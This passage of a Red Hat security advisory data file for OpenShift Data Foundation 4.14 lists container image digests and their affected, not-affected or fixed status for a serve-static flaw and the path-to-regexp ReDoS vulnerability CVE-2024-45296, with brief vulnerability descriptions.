"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45296", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-09-09T19:20:18.127723+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", ], known_not_affected: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", 